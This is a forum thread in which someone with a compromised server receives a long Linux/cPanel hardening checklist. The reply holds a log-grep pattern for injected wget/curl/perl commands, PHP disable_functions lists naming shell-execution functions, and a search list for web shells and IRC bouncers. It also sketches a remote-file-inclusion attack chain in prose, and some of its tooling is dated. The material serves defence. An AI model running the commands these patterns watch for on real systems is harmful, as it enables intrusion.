Hi One of our servers seem compromised - we need to know of how they came and the damage done. What do you think should be our next steps? if there is a security expert who can harden our server, please PM too so that we can pay for your services while learning how to prevent this from happening from other servers. Thanks.
This should help you a bit find /usr/local/apache/domlogs -exec egrep -iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20′ {} \; in php.ini disable_functions = “exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd, proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec†1) The attacker finds a hole in your users local PHP script 2) The inject their own PHP code from a remote file making it run as if they uploade the page by regular FTP. 3) There are numerous ways you can easily collect the usernames of accounts, very very very easy. 4) You can start to then brute guess passwords of user accounts 5) You can then start scouring the server for local exploits and use them to your advantage. EG: The script you metioned in that include checks to see if wget, gcc and other system binaries are on the system and asssible for the attacker to use. 6) With a list of whats installed and what they can use, they can now download hacks and start trying to crack your machine and compiling code attempting to gain root, etc. 7) They can search any and all 777 permission files/directories and inject whatever they feel like. Good times for them, crappy time for the site owners and server owners to clean up the mess. Preventing this is a combination of things that I won’t go into complete details about but I’ll brief over so you get the idea. 1) Lock your system binaries, like wget, gcc, and others to stop anyone from using them. 2) Secure PHP by disabling functions used such as: proc_open, exec, system, passthru and so on. 3) Make sure PHP/Apache is up to date 4) Install mod_security and have CURRENT ruleset! Mod_security through cPanel install has NO ruleset! I have rulesets I give all my clients which are tried, tested and true. 5) Have a current kernel installed, there are many exploits that still work on a lot of providers. Reference : http://forums.cpanel.net/showthread.php?t=62821&highlight=all+index+page+got+hacked more is below.. =========================================================================== secure your linux server: ============================================================================================== 1. Kernel recompile with GR security 2. firewall = CSF 3. Stop unnecessary processes 4. Logcheck 5. Logwatch Optimizing host.conf and sysctl.conf http://www.eth0.us/node/104 To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf Scroll down to MailTo = root and change to Mailto = Note: Set the e-mail address to an offsite account incase you get hacked. Now scroll down to Detail = Low Change that to Medium, or High… Detail = 5 or Detail = 10 Note: High will give you more detailed logs with all actions. Save and exit. 6. WHM configuration check 7. OpenSSH configuration check 8. Switch from proftpd to pure-ftpd 9. Rootkit Hunter rkhunter: ———– 1. Login to your server via SSH as root. Then Type: cd /usr/local/src/ 2. Download RKHunter Version 1.1.4 Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz 3. Extract files Type: tar -xzvf rkhunter-1.1.4.tar.gz 4. Type: cd rkhunter 5. Type: ./installer.sh 6. Lets setup RKHunter to e-mail you you daily scan reports. Type: pico -w /etc/cron.daily/rkhunter.sh Add The Following: #!/bin/bash (/usr/local/bin/rkhunter -c –cronjob 2>&1 | mail -s “RKhunter Scan Details†) Replace the e-mail above with your e-mail!! It is best to send the e-mail to an e-mail off-site so that if the box IS compromised the hacker can’t erase the scan report unless he hacks another server too. Type: chmod +x /etc/cron.daily/rkhunter.sh 10. Chkrootkit Installing chkrootkit —————— [root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz [root@server ~]# tar xvfz chkrootkit.tar.gz [root@server ~]# ./chkrootkit*/chkrootkit 11. mod_security 12. mod_evasive 13. Host spoof protection 14. Operating System check 15. Name server configuration check 16. Disk check 17. Kernel check 18. Apache tune and check 19. MySQL tune and check 20. Enhanced log rotation 21. Day of the week backup rotations 22. Secure /tmp /var/tmp /dev/shm 23. Libsafe for 2.4 kernels 24. Exploit check 25. Delete unnecessary OS users 26. Disable open DNS recursion 27. Enhanced path protection 28. Remove SUID/GUID from binaries 29. PHP hardening 30. phpsuexec 31. Disable vulnerable phpBB installs 32. Initial cPanel configuration 33. Check iptables is configured 34. Check incoming MySQL port 35. Check /etc/cron.daily/logrotate 36. Check /etc/resolv.conf for localhost entry 37. Check /etc/named.conf for recursion restrictions 38. Check server runlevel 39. Check nobody cron 40. Check Operating System support 41. Check SSHv1 is disabled 42. Check SSH on non-standard port 43. Check SSH PasswordAuthentication 44. Check telnet port 23 is not in use 45. Check shell limits 46. Check Background Process Killer 47. Check root forwarder 48. Check exim for extended logging 49. Check php for enable_dl = enable_dl = Off 50. Check php for disable_functions= disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen 51. Check php for register_globals register_globals = Off 52. Check php open_basedir protection 53. Check phpsuexec 54. Check cPanel login is SSL only 55. Check boxtrapper is disabled 56. Check max emails per hour is set 57. Check whether users can reset passwords via email 58. Check whether native cPanel SSL is enabled 59. Check compilers 60. Check Anonymous FTP access 61. Check allow remote domains 62. Check block common domains 63. Check allow park domains 64. Check package updates 65. Check security updates 66. Check melange chat server 67. service cups stop; chkconfig cups off 68. service xfs stop; chkconfig xfs off 69. service atd stop; chkconfig atd off 70. service nfslock stop; chkconfig nfslock off 71. service canna stop; chkconfig canna off 72. service FreeWnn stop; chkconfig FreeWnn off 73. service cups-config-daemon stop; chkconfig cups-config-daemon off 74. service iiim stop; chkconfig iiim off 75. service mDNSResponder stop; chkconfig mDNSResponder off 76. service nifd stop; chkconfig nifd off 77. service rpcidmapd stop; chkconfig rpcidmapd off 78. service bluetooth stop; chkconfig bluetooth off 79. service anacron stop; chkconfig anacron off 80. service gpm stop; chkconfig gpm off 81. service saslauthd stop; chkconfig saslauthd off 82. service avahi-daemon stop; chkconfig avahi-daemon off 83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off 84. service hidd stop; chkconfig hidd off 85. service pcscd stop; chkconfig pcscd off 86. service sbadm stop; chkconfig sbadm off 87. service webmin stop; chkconfig webmin off 88. Add Load Alert Scripts with 1 min cron #!/bin/bash #uptime alerti script .. UP=`uptime|awk ‘{print $(NF-2)}’|cut -d. -f1` if test $UP -gt 4 then `uptime| mail -s “**SERVER LOAD is $UP†` fi 89. ignore ping : # iptables -A INPUT -p icmp -j DROP echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all vi /etc/sysctl.conf Append following line: net.ipv4.icmp_echo_ignore_all = 1 90. Find directory with 777 permission. find . -type d -perm 777 91.Check for open ports using nmap command. 92. Disable identification output for Apache To disable the version output for proftp, SSH into server and login as root. At command prompt type: pico /etc/httpd/conf/httpd.conf Scroll (way) down and change the following line to ServerSignature Off Restart Apache At command prompt type: /etc/rc.d/init.d/httpd restart 93.Change ssh ListenAddress /etc/ssh/sshd_config 94.PermitRootLogin no 95.Add root login alert vi .bash_profile echo ‘ALERT – Root Shell Access on:’ `date` `who` | mail -s “Alert: Root Access from `who | awk ‘{print $6}’`†96.Set an SSH Legal Message in /etc/motd 97.Locate. locate shell.php locate irc locate eggdrop locate bnc locate BNC locate ptlink locate BitchX locate guardservices locate psyBNC locate .rhosts 98.Perform some udp and tcp scan here : http://www.hackerwatch.org/probe/ This site is not bad too : https://grc.com/x/ne.dll?bh0bkyd2 99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues. 100.Check your box to see if your performance has degraded or if your machine is being over used. For that, use the commands vmstat Displays information about memory, cpu and disk. Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count) mpstat Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not. Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count) iostat This command displays statistics about the disk system. Useful options: -d – Gives the device utilization report. -k – Display statistics in kilobytes per second. Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count) sar Displays overall system performance. Check to see if your server has any hidden processes running. ps Displays the status of all known processes. lsof 101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command. chmod -R 700 /etc/rc.d/init.d/* Use rpm -Va to find out if an rpm is modified * Apply security patches to vulnerable software (ie. patch -p1 < patch file) * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty * Check system logs (eg: /var/log/messages, /var/log/secure, etc.) * Set a password on the boot loader (lilo and grub both support this) * Monitor the system (nagios or big brother) 102. Install AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire. = http://www.cs.tut.fi/~rammer/aide.html 103. Testing phase Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test. 100. Reference * What is spoofing ? : http://en.wikipedia.org/wiki/Spoofing_attack * What is icmp ?: http://en.wikipedia.org/wiki/Icmp * For amule : http://www.amule.org/wiki/index.php/Firewall * SANS Top-20 Internet Security Attack Targets: http://www.sans.org/top20/ * http://ubuntuforums.org/showthread.php?t=159661&highlight=firewall * http://www.hostlibrary.com/Areyourserverssecure.html